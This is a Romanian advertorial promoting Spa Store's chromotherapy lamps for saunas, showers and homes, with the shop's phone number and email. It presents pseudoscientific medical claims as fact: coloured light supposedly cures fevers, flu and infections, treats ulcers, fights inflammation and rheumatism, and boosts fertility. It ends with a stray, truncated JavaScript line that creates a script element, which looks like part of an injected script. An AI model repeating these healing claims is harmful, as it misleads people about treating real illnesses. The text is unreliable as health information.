Lampi cromoterapie – bucurie pentru trup si suflet

Iti place sa faci sauna? Cu siguranta ca-ti place, relaxarea si starea de bine pe care le resimti dupa o sedinta de sauna umeda sau uscata sunt inconfundabile. Insa te-ai gandit ca ai putea beneficia si de avantajele saunei, dar si de cele ale cromoterapiei in acelasi timp? Pentru a te bucura si de detoxifiere si relaxare, dar si de buna dispozitie, cumpara-ti si tu lampi cromoterapie special create pentru saune. Acestea sunt echipamente moderne care iti vor oferi clipe de neuitat, relaxare, destresare si energizare, toate aceste mari avantaje doar in cateva minute petrecute in sauna.

Lampi cromoterapie si ROGVAIV-ul

 

Lampi cromoterapie – bucurie pentru trup si sufletCromoterapia este considerata a fi un “medicament” care vindeca prin culoare. Daca pana acum ai vazut culorile strict ca pe o caracteristica fizica a obiectelor din jurul tau, afla ca acestea nu-ti incanta doar privirea, insa te pot chiar vindeca.

Medicina alternativa este cea care foloseste cromoterapia pentru a-ti ajuta atat mintea, cat si trupul fizic sa-si regaseasca echilibrul si starea de sanatate. Si nu este o descoperire noua, a cercetatorilor moderni; cromoterapia a fost utilizata inca din cele mai vechi timpuri de catre toate popoarele.

Cum functioneaza totusi, cromoterapia? Ea reuseste sa combine cu succes efectele terapeutice ale luminii colorate cu zonele reflexe situate pe corp, prin stimularea acestora din urma. Astfel, cele 7 culori ale curcubeului sau ROGVAIV-ul, te poate ajuta in nenumarate situatii:

1. Rosu. Aceasta culoare stimuleaza metabolismul, digestia, intestinul subtire si fertilitatea;

2. Portocaliu. Este culoarea vitalitatii si trateaza dereglarile digestive si ulcerul;

3. Galben. Digestia, ficatul, rinichii si stomacul, toate aceste organe beneficiaza de pe urma efectului terapeutic al culorii galben;

4. Verde. Este o culoare ce te ajuta sa te reechilibrezi cu totul, in special sistemul nervos si persoanele anxioase sunt ajutate de catre verde;

5. Albastru. Daca ai temperatura, gripa sau suferi din cauza unei infectii, albastrul este culoarea indicata pentru a te vindeca. In plus, are si rolul de a calma persoanele extrem de agitate;

6. Indigo. Este calmant si combate inflamatiile;

7. Violet. Combate reumatismul, ajuta splina si vezica sa functioneze normal si are grija de aspectul pielii tale.

Lampi cromoterapie de la Spa Store

 

Cum poti beneficia de toate efectele pozitive ale cromoterapiei chiar la tine acasa? Cumparandu-ti si tu lampi pentru cromoterapie, special concepute pentru functionarea lor in interiorul saunei, astfel incat sa impusti 2 iepuri dintr-o lovitura.

De unde poti cumpara lampi cromoterapie? Din magazinul Spa Store, un magazin online care iti pune la dispozitie foarte multe produse dedicate starii tale de bine cum sunt saunele, Lampi cromoterapie – bucurie pentru trup si suflet1lampile de cromoterapie sau baile de abur.

Lampile pentru cromoterapie sau iluminarea decorativa ambientala de la Spa Store au la baza LED-uri si sunt solutii potrivite atat pentru amplasarea lor in saune, cat si in cabinele de dus, bai, cazi, bai de abur, living-uri si dormitoare, curti sau in rigolele de scurgere.

Lampile pentru cromoterapie Spa Store sunt de calitate superioara si rezista cu brio la temperaturi ridicate cum sunt cele din interiorul saunelor. Pot functiona pe baza de LED, neon sau chiar cu fibra optica si sunt controlate cu ajutorul telecomenzii, pentru a-ti fi mai comod si mai usor sa beneficiezi de relaxare totala.

Daca vrei sa ai parte de calitate, alege lampi cromoterapie de la Spa Store. Ai nevoie de informatii suplimentare despre magazinul si produsele Spa Store? Pentru detalii si comenzi, suna la numarul 0725-332.892 sau trimite un e-mail pe adresa office@spastore.ro.

Articol oferit de zoom-biz.ro 

var d=document;var s=d.createElement(‘script’);